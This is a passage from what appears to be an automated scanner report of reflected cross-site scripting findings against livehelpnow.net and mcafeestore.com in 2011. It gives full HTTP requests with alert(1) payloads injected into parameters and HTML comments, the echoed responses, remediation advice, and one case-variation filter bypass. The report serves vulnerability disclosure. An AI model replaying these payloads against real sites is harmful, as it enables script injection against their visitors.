GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=15324a9d'%3balert(1)//12dd260b5d&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack=''; var blhnInstalled=0; if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnli ...[SNIP]... eft=' + wleft + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=no,copyhistory=no,resizable=yes'); }
Zslide(); }
if (('15324a9d';alert(1)//12dd260b5d'!='') && ('52'!='')) { if (document.location.protocol=='https:') { document.write("<a href=\"#\" onclick=\"OpenLHNChat();return false;\"> ...[SNIP]...
The value of the iwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d986e"%3balert(1)//33c82be1078 was submitted in the iwidth parameter. This input was echoed as d986e";alert(1)//33c82be1078 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153d986e"%3balert(1)//33c82be1078&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the lhnid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 43ce9%3balert(1)//7a45b0cc4f0 was submitted in the lhnid parameter. This input was echoed as 43ce9;alert(1)//7a45b0cc4f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=667443ce9%3balert(1)//7a45b0cc4f0&iv=1&iwidth=153&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31c90"%3balert(1)//d2dc7402ec7 was submitted in the lhnid parameter. This input was echoed as 31c90";alert(1)//d2dc7402ec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=667431c90"%3balert(1)//d2dc7402ec7&iv=1&iwidth=153&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack=''; var blhnInstalled=0; if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnli ...[SNIP]... <img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=50.23.123.106|667431c90";alert(1)//d2dc7402ec7|9/30/2011 8:25:13 AM' /> ...[SNIP]...
The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 30155%3balert(1)//b4ab12f6b54 was submitted in the zimg parameter. This input was echoed as 30155;alert(1)//b4ab12f6b54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=160230155%3balert(1)//b4ab12f6b54&lhnid=6674&iv=1&iwidth=153&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the zzwindow request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98172'%3balert(1)//09425fa3c1e was submitted in the zzwindow parameter. This input was echoed as 98172';alert(1)//09425fa3c1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153&iheight=52&zzwindow=098172'%3balert(1)//09425fa3c1e&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack=''; var blhnInstalled=0; if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnli ...[SNIP]... < millis); }
if (blhnInstalled==0) { var lhnjava; var lhnreg = new RegExp('/'); var lhnreferrer = escape(document.referrer); var lhnwindow='098172';alert(1)//09425fa3c1e';
var lhnpagetitle=(document.title.length> ...[SNIP]...
3.426. http://www.mcafeestore.com/store [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mcafeestore.com
Path:
/store
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 97f5c--><script>alert(1)</script>80c456126cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64806100151,0) Date: Fri, 30 Sep 2011 12:01:43 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app65 Content-Length: 27266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?97f5c--><script>alert(1)</script>80c456126cf=1&Action=DisplayESIPage&Currency=GBP&ESIHC=9e374b31&Env=BASE&Locale=en_GB&SiteID=mfe&StyleID=25180600&StyleVersion=30&ceid=176851100&cename=TopHeader&id=HomeOffersPage"--> ...[SNIP]...
3.427. http://www.mcafeestore.com/store/mfe/DisplayHomePage [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mcafeestore.com
Path:
/store/mfe/DisplayHomePage
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3a25b--><script>alert(1)</script>20333834b39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage?3a25b--><script>alert(1)</script>20333834b39=1 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=172182913173,0) Content-Length: 27309 Date: Fri, 30 Sep 2011 12:44:32 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?3a25b--><script>alert(1)</script>20333834b39=1&Action=DisplayESIPage&Currency=GBP&ESIHC=4b937cbd&Env=BASE&Locale=en_GB&SiteID=mfe&StyleID=25180600&StyleVersion=30&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.428. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b0da8--><script>alert(1)</script>3eb6e67c250 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK?b0da8--><script>alert(1)</script>3eb6e67c250=1 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859114603,0) Content-Length: 22351 Date: Fri, 30 Sep 2011 12:45:27 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="da" lang="da"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=DKK&ESIHC=c4711e3e&Env=BASE&Locale=da_DK&SiteID=mfe&StyleID=25691600&StyleVersion=17&b0da8--><script>alert(1)</script>3eb6e67c250=1&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.429. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK%20 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e9f62--><script>alert(1)</script>3b66fc163e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK%20?e9f62--><script>alert(1)</script>3b66fc163e6=1 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859104265,0) Content-Length: 22379 Date: Fri, 30 Sep 2011 12:45:18 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="da" lang="da"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=DKK&Currency=DKK+&ESIHC=c4711e3e&Env=BASE&Locale=da_DK&SiteID=mfe&StyleID=25691600&StyleVersion=17&ceid=176851100&cename=TopHeader&e9f62--><script>alert(1)</script>3b66fc163e6=1&id=HomeOffersPage&script> ...[SNIP]...
3.430. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.de_DE [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mcafeestore.com
Path:
/store/mfe/DisplayHomePage/locale.de_DE
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9a012--><script>alert(1)</script>4b5e159ff0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.de_DE?9a012--><script>alert(1)</script>4b5e159ff0c=1 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=137823220027,0) Content-Length: 24232 Date: Fri, 30 Sep 2011 12:45:16 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="de" lang="de"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?9a012--><script>alert(1)</script>4b5e159ff0c=1&Action=DisplayESIPage&Currency=EUR&ESIHC=c4711e3e&Env=BASE&Locale=de_DE&SiteID=mfe&StyleID=25691100&StyleVersion=20&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.431. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.AUD [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a1803--><ScRiPt>alert(1)</ScRiPt>90a9b8ecfa6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /store/mfe/DisplayHomePage/locale.en_AU/Currency.AUD?a1803--><ScRiPt>alert(1)</ScRiPt>90a9b8ecfa6=1 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=189362801782,0) Content-Length: 22022 Date: Fri, 30 Sep 2011 12:44:51 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=AUD&ESIHC=c4711e3e&Env=BASE&Locale=en_AU&ScRiPt>90a9b8ecfa6=1&SiteID=mfe&StyleID=25690700&StyleVersion=17&a1803--><ScRiPt>alert(1)</ScRiPt>90a9b8ecfa6=1&ceid=176851100&cename=TopHeader&id=HomeOffersPage"--> ...[SNIP]...
3.432. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6fb79--><script>alert(1)</script>fc01acd1c27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD?6fb79--><script>alert(1)</script>fc01acd1c27=1 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=197952748186,0) Content-Length: 24170 Date: Fri, 30 Sep 2011 12:45:02 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?6fb79--><script>alert(1)</script>fc01acd1c27=1&Action=DisplayESIPage&Currency=NZD&ESIHC=c4711e3e&Env=BASE&Locale=en_AU&SiteID=mfe&StyleID=25690700&StyleVersion=17&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.433. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD%20 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3b99a--><script>alert(1)</script>af58d55f6c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD%20?3b99a--><script>alert(1)</script>af58d55f6c7=1 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=292442027539,0) Content-Length: 22051 Date: Fri, 30 Sep 2011 12:45:01 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?3b99a--><script>alert(1)</script>af58d55f6c7=1&Action=DisplayESIPage&Currency=AUD&Currency=NZD+&ESIHC=c4711e3e&Env=BASE&Locale=en_AU&SiteID=mfe&StyleID=25690700&StyleVersion=17&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.434. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_HK [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mcafeestore.com
Path:
/store/mfe/DisplayHomePage/locale.en_HK
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d804f--><script>alert(1)</script>2393c4a14c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.en_HK?d804f--><script>alert(1)</script>2393c4a14c8=1 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=107758469954,0) Content-Length: 24151 Date: Fri, 30 Sep 2011 12:45:36 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=HKD&ESIHC=c4711e3e&Env=BASE&Locale=en_HK&SiteID=mfe&StyleID=25690900&StyleVersion=17&ceid=176851100&cename=TopHeader&d804f--><script>alert(1)</script>2393c4a14c8=1&id=HomeOffersPage&script> ...[SNIP]...
3.435. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.fr_FR [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mcafeestore.com
Path:
/store/mfe/DisplayHomePage/locale.fr_FR
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1f851--><script>alert(1)</script>699ad509a1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.fr_FR?1f851--><script>alert(1)</script>699ad509a1e=1 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=129233291908,0) Content-Length: 24323 Date: Fri, 30 Sep 2011 12:45:22 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="fr" lang="fr"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?1f851--><script>alert(1)</script>699ad509a1e=1&Action=DisplayESIPage&Currency=EUR&ESIHC=c4711e3e&Env=BASE&Locale=fr_FR&SiteID=mfe&StyleID=25691000&StyleVersion=20&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.436. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.it_IT [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mcafeestore.com
Path:
/store/mfe/DisplayHomePage/locale.it_IT
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a1e9d--><script>alert(1)</script>68ed7624ca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.it_IT?a1e9d--><script>alert(1)</script>68ed7624ca6=1 HTTP/1.1 Host: www.mcafeestore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=202247765601,0) Content-Length: 26606 Date: Fri, 30 Sep 2011 12:45:51 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app67 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="it" lang="it"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=EUR&ESIHC=c4711e3e&Env=BASE&Locale=it_IT&SiteID=mfe&StyleID=25691200&StyleVersion=18&a1e9d--><script>alert(1)</script>68ed7624ca6=1&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.437. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.nl_NL [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mcafeestore.com
Path:
/store/mfe/DisplayHomePage/locale.nl_NL
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 917e8--><script>alert(1)</script>e342d0f2059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
